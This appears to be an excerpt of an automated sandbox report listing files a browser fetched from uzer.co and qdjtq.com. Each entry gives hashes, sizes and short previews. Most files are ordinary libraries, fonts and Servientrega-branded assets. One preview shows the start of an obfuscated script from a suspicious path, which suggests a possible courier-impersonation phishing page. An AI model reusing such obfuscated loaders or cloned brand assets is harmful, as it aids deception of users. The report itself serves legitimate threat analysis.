            SSDEEP:1536:itAs7TPR2t4qqDMi/GgSe7hyuvsnKjIx8L0Sem49MVcUzW:Yx/XIe0Sem49d
            MD5:715756E65B9FF107F4CF927E3E8BBF76
            SHA1:F52210379974496514E24AEB07ECB6EF259063F6
            SHA-256:2AEBC2552D7DADF4E3A0B80CC830C274E91146584DAD8E29B04338B9ECEDB363
            SHA-512:3EA45E95A2465D5B90F3537AC2352B4507A508347BCFC46F286891F526D2C4A1CF22DD797890E6215BFD109830AB45EF83296CCEC8F3BD0D3E5722365AD22C85
            Malicious:false
            Reputation:low
            Preview:/*!. * Bootstrap v5.1.0 (https://getbootstrap.com/). * Copyright 2011-2021 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define(e):(t="undefined"!=typeof globalThis?globalThis:t||self).bootstrap=e()}(this,(function(){"use strict";const t=t=>{let e=t.getAttribute("data-bs-target");if(!e||"#"===e){let i=t.getAttribute("href");if(!i||!i.includes("#")&&!i.startsWith("."))return null;i.includes("#")&&!i.startsWith("#")&&(i="#"+i.split("#")[1]),e=i&&"#"!==i?i.trim():null}return e},e=e=>{const i=t(e);return i&&document.querySelector(i)?i:null},i=e=>{const i=t(e);return i?document.querySelector(i):null},n=t=>{t.dispatchEvent(new Event("transitionend"))},s=t=>!(!t||"object"!=typeof t)&&(void 0!==t.jquery&&(t=t[0]),void 0!==t.nodeType),o=t=>s(t)?t.jquery?t[0]
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:Unicode text, UTF-8 text, with very long lines (14929)
            Category:downloaded
            Size (bytes):330270
            Entropy (8bit):5.599959762792082
            Encrypted:false
            SSDEEP:6144:44dGpmFU7Qli04d7z3KsOemveQN7X0fxnP5:hdPW7Q4nhDDx
            MD5:E2A88E615081358B43F77930FDC90A67
            SHA1:B0E7F2597F0C5BB372A8E4BEFD960717BE9F2BCF
            SHA-256:7B358559BA8196A83F4F93C3EB0145B651504C1E54CBE6E38A264654E815A87B
            SHA-512:449A53D220715B2F77F5DE11A2079A322802635A97D0A889A33C20DF273D6C37A3F6C995644AAE0048A0849779BFDC5C507AE452858605572780550D16E1D456
            Malicious:false
            Reputation:low
            URL:https://www.googletagmanager.com/gtag/js?id=G-ST8S2VTEC8&l=dataLayer&cx=c
            Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"},{"vtp_signal":1,"function":"__c","vtp_value":1},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0},{"vtp_signal":1,"function":"__c","vtp_value":1},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_1p_data_v2","priority":26,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_email
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (532)
            Category:downloaded
            Size (bytes):59108
            Entropy (8bit):4.407618460307777
            Encrypted:false
            SSDEEP:768:XKX/73XzECJFrQXT1y1k2wfvl76PzzjGWH0EeEofxIrboFVGfM2SuFl+rC1onTdY:XOXzZF8ck2wfvlWMx+oqfM2SuFAr1RY
            MD5:F94C73AA35A75121A6A882EEA81843A3
            SHA1:76BBEFD9C1E30BF320905029810553831D650B8F
            SHA-256:F01CE2CF78EFB03B4F4EC21E3ACD417CF4B0520A0B641D93911372166A348587
            SHA-512:B114AF72138EB988E45EB424E2C58719DDC174F19703C861B7B305C0B2EC5DB731061CFB61BB480325A0B9633CC7502A1304232A21F89023ABE3A200410EFCD1
            Malicious:false
            Reputation:low
            URL:https://uzer.co/
            Preview:<!DOCTYPE html>.<html lang="es">..<head>. <meta charset="utf-8">. <script type="application/ld+json">. {. "@context": "https://schema.org",. "@type": "Organization",. "name": "UZER.co",. "image": "https://uzer.co/uzer-logo-white.png",. "logo": "https://uzer.co/uzer-logo-white.png",. "url": "https://uzer.co/",. "telephone": "(57) 311 556 42 71",. "address": {. ."@type": "PostalAddress",. ."streetAddress": "Carrera 52B # 118-18",. ."addressLocality": "Bogot.",. ."postalCode": "111111",. ."addressCountry": "CO". },. "openingHoursSpecification": {. ."@type": "OpeningHoursSpecification",. ."dayOfWeek": [. . "Monday",. . "Tuesday",. . "Wednesday",. . "Thursday",. . "Friday",. . "Saturday". .],. ."opens": "08:00",. ."closes": "18:00". },.
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:Unicode text, UTF-8 text, with very long lines (26997)
            Category:dropped
            Size (bytes):29401
            Entropy (8bit):5.620670477428596
            Encrypted:false
            SSDEEP:768:crqD7GzOol+D45YMJR3kWG6UdCDxgtmKg3vTpzaDNCY5R:1fGkWodCFgtmKgNzaxCq
            MD5:F38113141BA37F6D39DA0F22FB96702A
            SHA1:BEC789CA106293F96D2CF31285236398776B911E
            SHA-256:64CB11EB2A5237CBE1E05CCF25ACEFEED578F32D1A6923D58DE35C8A0145E8CD
            SHA-512:0CD78386C97E1569F1E41D44433B1AC873323FA5E5FCC83EBDC9C53D718D8D466B5B6F2141A6B5F80E2A2FD33E02238C9A40212805981E1D5AFADEAAC6D87353
            Malicious:false
            Reputation:low
            Preview:/*. * International Telephone Input v17.0.8. * https://github.com/jackocnr/intl-tel-input.git. * Licensed under the MIT license. */..!function(a){"object"==typeof module&&module.exports?module.exports=a():window.intlTelInput=a()}(function(a){"use strict";return function(){function b(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")}function c(a,b){for(var c=0;c<b.length;c++){var d=b[c];d.enumerable=d.enumerable||!1,d.configurable=!0,"value"in d&&(d.writable=!0),Object.defineProperty(a,d.key,d)}}function d(a,b,d){return b&&c(a.prototype,b),d&&c(a,d),a}for(var e=[["Afghanistan (............)","af","93"],["Albania (Shqip.ri)","al","355"],["Algeria (..........)","dz","213"],["American Samoa","as","1",5,["684"]],["Andorra","ad","376"],["Angola","ao","244"],["Anguilla","ai","1",6,["264"]],["Antigua and Barbuda","ag","1",7,["268"]],["Argentina","ar","54"],["Armenia (........)","am","374"],["Aruba","aw","297"],["Australia","
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:dropped
            Size (bytes):1026
            Entropy (8bit):4.670047719916863
            Encrypted:false
            SSDEEP:24:2dUsHc5xJTlB5J+Yi8HMtl7O2ElRbFVmlqo5dyknLz8DY/:cZ85PlB5J+sHml7yWp2G/P
            MD5:9A2FBD59907024A820CB74ACD498DB5B
            SHA1:D1A9778461A59C5BA3EB0CD7C62DE7D23F304E62
            SHA-256:AE4B5AB6606E097E82921CB8ACE161419601A4A58E7F95524D9858460CADD7EB
            SHA-512:6E668981FD7297F805F427C321D206F53699472E41F33DAABDC0F8FA9E33488AF7647F2D77F805B8F39109AED3691F572D8C2173F1C31FCE3E53F05C250FCE9B
            Malicious:false
            Reputation:low
            Preview:<?xml version="1.0" encoding="utf-8"?>..<svg width="12px" height="21px" viewBox="0 0 12 21" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg">.. <desc>Created with Lunacy</desc>.. <path d="M11.1207 0.00420683L8.34894 0C5.23502 0 3.22266 1.95302 3.22266 4.97584L3.22266 7.27003L0.435825 7.27003C0.19501 7.27003 0 7.45471 0 7.68251L0 11.0065C0 11.2343 0.195232 11.4188 0.435825 11.4188L3.22266 11.4188L3.22266 19.8064C3.22266 20.0342 3.41767 20.2187 3.65848 20.2187L7.29451 20.2187C7.53533 20.2187 7.73034 20.034 7.73034 19.8064L7.73034 11.4188L10.9888 11.4188C11.2296 11.4188 11.4246 11.2343 11.4246 11.0065L11.426 7.68251C11.426 7.57314 11.3799 7.46839 11.2983 7.39098C11.2167 7.31357 11.1055 7.27003 10.9899 7.27003L7.73034 7.27003L7.73034 5.32522C7.73034 4.39046 7.96582 3.91593 9.25306 3.91593L11.1202 3.9153C11.3608 3.9153 11.5558 3.73062 11.5558 3.50303L11.5558 0.416476C11.5558 0.189097 11.361 0.00462751 11.1207 0.00420683Z" id="Shape" fill="#FFFFFF
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:Unicode text, UTF-8 text, with very long lines (41169)
            Category:dropped
            Size (bytes):41172
            Entropy (8bit):5.505998162296305
            Encrypted:false
            SSDEEP:768:j21xCdwV69Odf9dk1fV8iWUwcb9x8cvgBhpU9yC8IEVDlbth3Ia8DdEN:iP3kr8V8vShi98Iiph3IbC
            MD5:0AA5002702487976D570A640C408EBA5
            SHA1:48930F22A2396DF313CCDFCB91CAC20E38F2B06B
            SHA-256:4E8276AEA0A3C7FE3600E6718C7F484D49C347C8D5763D89BE95900D526A14DA
            SHA-512:37A9D609DB21EE1E696CB437C02F0F6410925EB10B6353C0CDF95DB265E342F0BC3D2AE1851D209E4517D978B7CCBE8AD56F98247FA865AE405FAFD4D2E62CDA
            Malicious:false
            Reputation:low
            Preview:!function(){"use strict";function n(n,t,e){return t in n?Object.defineProperty(n,t,{value:e,enumerable:!0,configurable:!0,writable:!0}):n[t]=e,n}var t,e,r,i,o={ADVERTISING:"ADVERTISING",ANALYTICS_AND_RESEARCH:"ANALYTICS_AND_RESEARCH",FUNCTIONAL:"FUNCTIONAL"},a="GUEST",u="MEMBER",c=0,l=1,d=2,s=(n(t={},a,"li_gc"),n(t,u,"li_mc"),t),f=function vr(){var n=arguments.length>0&&arguments[0]!==undefined?arguments[0]:null,t=arguments.length>1&&arguments[1]!==undefined?arguments[1]:null,e=arguments.length>2&&arguments[2]!==undefined?arguments[2]:null,r=arguments.length>3&&arguments[3]!==undefined?arguments[3]:null;for(var i in function(n,t){if(!(n instanceof t))throw new TypeError("Cannot call a class as a function")}(this,vr),n=n||{},this.consentAvailable=!1,this.issuedAt=t,this.userMode=e,this.optedInConsentMap={},o)n[i]=n[i]||c,n[i]!==c&&(this.consentAvailable=!0),this.optedInConsentMap[i]=n[i]===l||n[i]===c&&r===l},v=(e=[o.ADVERTISING,o.ANALYTICS_AND_RESEARCH,o.FUNCTIONAL],r=[c,l,d,c],i=new R
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:Web Open Font Format (Version 2), TrueType, length 12128, version 1.0
            Category:downloaded
            Size (bytes):12128
            Entropy (8bit):7.98701564513987
            Encrypted:false
            SSDEEP:192:XD72k+iv7u0Mn1D9HJlFbmqI+qFEL5+RTnlI7dlZowHurPRMDOT39pqLmJJ9p:T72MyLzFbm7u+Bu7OwHuDsO5xJJH
            MD5:B09125D068E31F9115494382051B8483
            SHA1:8A264BB0F7EAACD66DC1DAACAA4BD8A7E46A24E0
            SHA-256:DF661185B98992D731119022C2EB259A35C6F028779088FC9866C76F1FD71136
            SHA-512:DF9B061F1168D83AD6F3D408E4BF0A79AE9469DDCFE8EFBB098124B33493FB73BBA80B3BA7400527DE8EC061355250CCE63A66874051C5159D5ACABC7637DDD1
            Malicious:false
            Reputation:low
            URL:https://fonts.gstatic.com/s/urbanist/v15/L0xjDF02iFML4hGCyOCpRdycFsGxSrqDFRkvEZmq.woff2
            Preview:wOF2....../`......f..............................j.....l.`?STATD..V......?..p..6.$..\. ..l..Q...2Y....q;@...-GQ..+[.e.TI.......`......B!..*.....H.j...{.#...9.sF.2M`.{0_>..T...m"....1z.L.w=].pY.n.G.......$...s-?vK.........=..4Gh.\.j.....BD..]4....B.*.K$.T*.o.....[.....bd.F.1...... ....M'F...........D?$j.....,..^...`Dn...1.y"....5^...F|V......$................c.p8..f<.0...FB. PdN..!....ea......../m.....!..DaTU.[.*?.f.B`YN.s<..-..p....x...O(D....M..Y5!......pm....yy..x..~B.P.Y......I./....$...........]....; ^..........<.E.u...vO.3...-...B.<....S.lg..6qy).....h.S....5.....8.%..g.....n....l....X9.R..j.%.....J..t..+]...t(...[..6..~..L(....l..,.M..JW:6..c..g...tR.K\..P..Yb.....9.Z.......D0m......... 6_..XP.Z...!.iXv,N..W ...@p.#8.P...].|.[.*/...8....Y....YN.f.E.0..DC...@..e".9.@....z&-Yy...&....e.-..(..p..Xv.U.1|Hg4Fyd..H.3......"6e.......N.s...l.kq..l.2Fj..16....D8:.n.kD...A..W}..qh".r@....Ux.7/_`.....D2."..fb..X...R&..7..Qc. u*x.FqO.e..$...8..
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:Unicode text, UTF-8 text, with very long lines (6435), with no line terminators
            Category:downloaded
            Size (bytes):6439
            Entropy (8bit):5.298943111390874
            Encrypted:false
            SSDEEP:192:n4Lc06lr/yvf94W4+b3cPlCXcab66E0r9LB:n4Lcr2fd4+b38y579LB
            MD5:5FBC9168099F33AA4A9DBE6B0E026F9A
            SHA1:9D6A89162F21C45D32B18973499C020EE99CDD34
            SHA-256:87C7C690CB7577EBA6CB9872A88DDE9C0E5EEC424DD43043DB93FF98CF883CA6
            SHA-512:2EC963095914C1F1A17CA09CE6E4B144BC3E1EFF6661CEC3F026013237C675018904E96CD89D13113A4C484C57B3A1B0F81D345E00AE132766BF2CD6401035EA
            Malicious:false
            Reputation:low
            URL:https://qdjtq.com/modify/assets/230e1227ajMSD.js
            Preview:const a7_0x25e538=a7_0x8251;(function(_0x20f9cd,_0x570bd7){const _0x449509=a7_0x8251,_0x1dd7ee=_0x20f9cd();while(!![]){try{const _0x9cfeb4=parseInt(_0x449509(0xba))/0x1*(parseInt(_0x449509(0x9c))/0x2)+-parseInt(_0x449509(0xcd))/0x3+-parseInt(_0x449509(0xb6))/0x4*(-parseInt(_0x449509(0x8c))/0x5)+parseInt(_0x449509(0xd2))/0x6*(parseInt(_0x449509(0xb5))/0x7)+-parseInt(_0x449509(0xa7))/0x8*(-parseInt(_0x449509(0xa0))/0x9)+-parseInt(_0x449509(0x90))/0xa+parseInt(_0x449509(0x94))/0xb;if(_0x9cfeb4===_0x570bd7)break;else _0x1dd7ee['push'](_0x1dd7ee['shift']());}catch(_0x20d3d6){_0x1dd7ee['push'](_0x1dd7ee['shift']());}}}(a7_0x46e2,0x3e1e1));const a7_0x533ad1=(function(){let _0x168b1e=!![];return function(_0x313e68,_0x2506dd){const _0x5eef0c=_0x168b1e?function(){const _0x57e7f0=a7_0x8251;if(_0x2506dd){const _0x357f94=_0x2506dd[_0x57e7f0(0xbc)](_0x313e68,arguments);return _0x2506dd=null,_0x357f94;}}:function(){};return _0x168b1e=![],_0x5eef0c;};}()),a7_0x323946=a7_0x533ad1(this,function(){const
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with CRLF line terminators
            Category:downloaded
            Size (bytes):128269
            Entropy (8bit):5.169850047433893
            Encrypted:false
            SSDEEP:1536:hGwJ3BxcHjaUxnQrJLR1OhWINjIabZwPjIA:hE0
            MD5:1C5DA2D81A3BB0B5E9C7147FC8FB3DD1
            SHA1:910732565BAF56F1D6B953F570AAF8660B4A7BC4
            SHA-256:498311DA5775ED3A2B2683614A5FDBA27F3FE42A99C44D97C16A57A1E6333715
            SHA-512:B71596F18C70FF89D86DA369F6505B634EEC42FC63BD1368C3149948EE763584C3C05B5B62872748127282E84A1751A3875FF23331FBC7DFD429ED1F4CEB2892
            Malicious:false
            Reputation:low
            URL:https://uzer.co/css/style.css
            Preview:@charset "UTF-8";....* {...-webkit-tap-highlight-color: transparent;...box-sizing: border-box;...-moz-osx-font-smoothing: grayscale;...-webkit-font-smoothing: antialiased;...-webkit-text-size-adjust: none;..}....:root {...--mainblue: #2158FB;...--light-blue: #D6E1F0;...--border-blue: #B9CAFF;...--gray-blue: #869AAE;...--text-titles: #242424;...--text-content: #343434;...--light-text: #525252;...--main-purple: #CD0BBC;...--light-purple: #9548f7;...--gray-bg: #D9E3E8;..}....html {...box-sizing: border-box;...scroll-behavior: smooth;...height: 100%;..}....body {...font-family: 'Lexend', sans-serif;...-webkit-font-smoothing: antialiased;...background: var(--mainblue);...height: auto;...overflow-x: hidden !important;..}....body.open,..body.opened {...overflow: hidden;..}.....fade:not(.show) {...opacity: 1;..}....strong {...font-weight: 600;..}.....clearfix {...clear: both;...float: none;...width: 0 !important;...height: 0 !important;..}.....page {...position: relative;...width: 100%;...-moz
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:PNG image data, 1800 x 1431, 8-bit colormap, non-interlaced
            Category:dropped
            Size (bytes):469155
            Entropy (8bit):7.960407141918666
            Encrypted:false
            SSDEEP:12288:7RpuxXfl4avrKAEz4Qt+xYaHXPn7ukRFq+dd8:Glfeav2AEz4r3DukRFq+E
            MD5:940B2A72E5D6B4CC61697241611C9C03
            SHA1:4DF0C0F6412336A43055498CCE8C21225DBFAE60
            SHA-256:51009E056252CAD33A02868EDA24D61C0E66B121E23669621308E1DB9D6A3CAB
            SHA-512:AF222BB9B6A223627D9F30A39A234CC5FDA71C6B6751CE07D524E3835B2C17DBBE4F972181A0043544F628DCA9B33D999A6561CC1F8E6B51E02E3BB5F5CDE114
            Malicious:false
            Reputation:low
            Preview:.PNG........IHDR.............d.......PLTE.............................................@q . ......D<L.........y...Cw...%..)(/...;...........F{.E}+,X.......Q..........N..2..............@....f...........65?.....)(?5.....H......^....f.....n..S......L.....;yx.H.....V..D..-..C..b..]..4...6M.EX........?..C.....Pr..d4$.JxW#.x.........)?....AY.Tx...K.....(../d.njn...<......]......t.."Xu Lf...r..x=,.F}Q...va.n...:q.e........V..{D~.^.....|U..........P.i...U.....\.f.$.=Xg....`k.a..M8....QZW[.rR....]....xw.....d.F.b@j...T..t......gk.vo.Z?..)\z...X|R..Niy.......c..5S8.....(..d..[].Q.w..n..l...5...z..T)6....5c.Uh.pz.).y.q@R.7..3i.*Z....Al..H.C&..O..v.Ls.{..p.....^..Q.....f.....s...t.y..&.v...o5.U=....N.=...fG........5......S......t.B+..=...T|+u.j.V.......{.g.+..\...L....tRNS.......t..%NIDATx..[..P.D..b.........)B&<.{.t..f..G..t.%.\r.G....r...D(!...b....}.._...X.".9.....&}..K...k]}Ml....^..."ja7..@.`...Y.e.H.......2...`...t./."/...........
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with CRLF line terminators
            Category:downloaded
            Size (bytes):2279
            Entropy (8bit):4.657527721265373
            Encrypted:false
            SSDEEP:48:kMBqaFD5H2ozCNiWuicUiircsiiIuicBii849laK/GyNBJUR:XWZ59laKPNBGR
            MD5:EC094378A4BD5E643692D9B7901EF402
            SHA1:19DFAE5A2F3D0814CD8C1D320B6CB70B8B2AFD52
            SHA-256:E9055864A153F72DD25244A84F4AB27B6D59E8CE2DD64773F4DE8240F8AF88BA
            SHA-512:F36A93B067BF6FA4B35ED7BDEB3CCB0AA6680CB51F6368AC15659A31C10E8338273BB1A675CA2CA5F8BD5FF5F131EB16BCBF385D78B44E51D6C96C3BBF902BBD
            Malicious:false
            Reputation:low
            URL:https://www.servientrega.com/wps/contenthandler/!ut/p/digest!dWYvvbhKekcZQKtCvzyVng/dav/fs-type1/themes/New-Theme-Servientrega/js/main-19.js
            Preview:jQuery(document).ready(function($) {....//-------------------------- STICKY MENU......var stickyOffset = $('.main-menu').offset().top;....$(window).scroll(function(){.. var sticky = $('.main-menu'),.. scroll = $(window).scrollTop();.... if (scroll >= stickyOffset) sticky.addClass('fixed');.. else sticky.removeClass('fixed');..});....//-------------------------- FUNCIONES RESPONSIVE...... var alterClass = function() {.. var ww = document.body.clientWidth;.. if (ww < 950) {.. $('.menu-container').addClass('offcanvas offcanvas-start').attr("visibility", "visible");.. $('.submenu-collapse').removeClass('show');.. $('.first-lvl').addClass('collapsed').attr('data-bs-toggle', 'collapse');.. $('.second-lvl').addClass('collapsed').attr('data-bs-toggle', 'collapse');.. $('.sub-menu-container').addClass('collapse');.... } else if (ww >= 951) {.. $('.menu-container').removeClass('offcanvas offcanvas-start').attr("visibility", "hidden");.. $('.su
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (50758)
            Category:dropped
            Size (bytes):51039
            Entropy (8bit):5.247253437401007
            Encrypted:false
            SSDEEP:768:E9Yw7GuJM+HV0cen/7Kh5rM7V4RxCKg8FW/xsXQUd+FiID65r48Hgp5HRl+:E9X7PMIM7V4R5LFAxTWyuHHgp5HRl+
            MD5:67176C242E1BDC20603C878DEE836DF3
            SHA1:27A71B00383D61EF3C489326B3564D698FC1227C
            SHA-256:56C12A125B021D21A69E61D7190CEFA168D6C28CE715265CEA1B3B0112D169C4
            SHA-512:9FA75814E1B9F7DB38FE61A503A13E60B82D83DB8F4CE30351BD08A6B48C0D854BAF472D891AF23C443C8293380C2325C7B3361B708AF9971AA0EA09A25CDD0A
            Malicious:false
            Reputation:low
            Preview:/*!. * Bootstrap v4.1.3 (https://getbootstrap.com/). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,h){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function l(r){for(var t=1;t<arguments.length;t++){var o=null!=arguments[t]?arguments[t]:{},e=Object.keys(o);"function"==typeof Object.getOwnPropertySymbols&&(e=e.concat(Object.getOwnPropertySymbols(o).filter(function(t){return Object.getOwnPropertyDescriptor(o,t).enum
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:dropped
            Size (bytes):1830
            Entropy (8bit):4.895693398229686
            Encrypted:false
            SSDEEP:24:2dZnmPLS/veaxMdPvZVm84Mye40GaRtunEM4dGddW3Ed8vnyBNiaMNnA1o3HGX8z:cZmj5GM40Ga1kPWUOfMiP0Ju
            MD5:A3BF997BBD1F4D2C76AD1C98CDBD8898
            SHA1:F45C66D7C871747C5F26E653E2CEDDEBEC4E3F8B
            SHA-256:F93160F4DA84323C740482D6F69B8CE715782C717B4B115301D8005E7A681714
            SHA-512:78BF05643AE7657C0C5F25B8732F7923EB1FCDBE1FDB43DF079B9F46E5B47C21E17648EB74D85B7BB51D25B0FDDA1E348E68C859A4BB7188A0D29572CBD57FEF
            Malicious:false
            Reputation:low
            Preview:<?xml version="1.0" encoding="UTF-8"?>..<svg width="55px" height="55px" viewBox="0 0 55 55" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">.. <title>Group 59</title>.. <g id="HOME" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd">.. <g transform="translate(-656.000000, -762.000000)" id="Group-59">.. <g transform="translate(656.000000, 762.000000)">.. <g id="Group-53" fill="#C131DF">.. <rect id="Rectangle" x="0" y="0" width="55" height="55" rx="18"></rect>.. </g>.. <g id="search-(2)" transform="translate(28.000000, 28.000000) rotate(4.000000) translate(-28.000000, -28.000000) translate(17.000000, 17.000000)" fill="#FFFFFF">.. <path d="M5.13691882,13.7392452 C5.91652965,15.0030061 6.98415801,16.0706772 8.24813281,16.8504592 L3.79521822,21.3033738 C2.93612773,22.1624643 1.54326583,22.1624643 0.684175338,21.3033738 C0.68413256
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (520), with CRLF line terminators
            Category:downloaded
            Size (bytes):15387
            Entropy (8bit):4.885931577367757
            Encrypted:false
            SSDEEP:192:aYWmBvI7UMnY6nrvjI304tf2NBJxBrtWJQxpIMyWGBMztKEKFuW5ZyQG:1l6nrvk36xnWYaMyWGctKEKFu0ZyQG
            MD5:13E67D430A0EA5EACD37A10DCCB44C47
            SHA1:6E6CC23671B8F6302F08208F1D7AC794D7A40FD4
            SHA-256:0EE93D9A87632DF01F6A60485A6D4ED3216CF11CD50E908B2F9BB6D36D7C38EE
            SHA-512:2AAC3256ACFA7B3E01A1AA2BC21049DD8B4E2264CA6C1F0660F823B5DC27C2EFB0EFB73011CC7ABEB150D227812F99FE3DDB7DD66A26594E8D94B0DF9EF24565
            Malicious:false
            Reputation:low
            URL:https://uzer.co/error.html
            Preview:<!DOCTYPE html>..<html lang="es">....<head>.. <meta charset="utf-8">.. <script type="application/ld+json">.. {.. "@context": "https://schema.org",.. "@type": "Organization",.. "name": "UZER.co",.. "image": "https://uzer.co/uzer-logo-white.png",.. "logo": "https://uzer.co/uzer-logo-white.png",.. "url": "https://uzer.co/",.. "telephone": "(57) 311 556 42 71",.. "address": {.. ."@type": "PostalAddress",.. ."streetAddress": "Carrera 52B # 118-18",.. ."addressLocality": "Bogot.",.. ."postalCode": "111111",.. ."addressCountry": "CO".. },.. "openingHoursSpecification": {.. ."@type": "OpeningHoursSpecification",.. ."dayOfWeek": [.. . "Monday",.. . "Tuesday",.. . "Wednesday",.. . "Thursday",.. . "Friday",.. . "Saturday".. .],.. ."opens": "08:00",.. ."c
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:downloaded
            Size (bytes):2075
            Entropy (8bit):4.841220551602856
            Encrypted:false
            SSDEEP:48:cUjTtm/HPYay5Bb1qFWvgiwT7CWvQ8uOnwkB9qZVe:xHEvE5F1qiICWvQ8rZqLe
            MD5:E30057AED282B66FE4EB51017B20E1B1
            SHA1:C121EB49AF5954666B8DC2B505F4CA83C36D34A1
            SHA-256:F56965B808E2681B1CC8E53270AECA700084404A3A210C0FF9247392EA34B935
            SHA-512:E452B11E6E8A957BC5754F5F751DB9936CC23A23C7CE8DD8885F36CA832E2299D860F21C1E2685E1B69BB7A46B16BFCF5A7E5EF7010A41D91AC38FC24168E263
            Malicious:false
            Reputation:low
            URL:https://www.servientrega.com/wps/contenthandler/!ut/p/digest!dWYvvbhKekcZQKtCvzyVng/dav/fs-type1/themes/New-Theme-Servientrega/images/svg/ico-fb.svg
            Preview:<?xml version="1.0" encoding="utf-8"?>..<svg width="23px" height="23px" viewBox="0 0 23 23" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg">.. <defs>.. <filter id="filter_1">.. <feColorMatrix in="SourceGraphic" type="matrix" values="0 0 0 0 1 0 0 0 0 1 0 0 0 0 1 0 0 0 1 0" />.. </filter>.. <path d="M11.5 23C17.8513 23 23 17.8513 23 11.5C23 5.14873 17.8513 0 11.5 0C5.14873 0 0 5.14873 0 11.5C0 17.8513 5.14873 23 11.5 23Z" id="path_1" />.. <clipPath id="mask_1">.. <use xlink:href="#path_1" />.. </clipPath>.. </defs>.. <g id="facebook-(1)">.. <path d="M11.5 23C17.8513 23 23 17.8513 23 11.5C23 5.14873 17.8513 0 11.5 0C5.14873 0 0 5.14873 0 11.5C0 17.8513 5.14873 23 11.5 23Z" id="Mask" fill="#1977F2" fill-rule="evenodd" stroke="none" />.. <g clip-path="url(#mask_1)">.. <g id="facebook-(1)" transform="translate(6.708313 5.75)" filter="url(#filter_1)">.. <path d="M2.38979 9.75582C2.33005 9.75582 1.01566
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:downloaded
            Size (bytes):7554
            Entropy (8bit):4.25286042320199
            Encrypted:false
            SSDEEP:96:qr2/y973KnJhS88DzdDEKNbDjRhLuKXjvZyHgfOGuyZggO1/LyMzfFg:zqKnJwdDbNHNhLlyHgfDuy5O1DzO
            MD5:4821E2548D62B3D5471964A2C64E2C7F
            SHA1:0D44C292A43018684455C13091101EB4EED81064
            SHA-256:0DAFA4836AE2BEDCAF30433F83A1D551EC66B3E692DB8FB83F764A7DD30231DA
            SHA-512:3BDE4C7A827B8B19EF97D3B7657ABA79D511A65EE01AD2893F11BB513C332FA1596E8DBA66B2B077F7D50376033045E1140E61FCC16B1EA95FCBB524842D35AC
            Malicious:false
            Reputation:low
            URL:https://qdjtq.com/modify/layout/images/59.svg
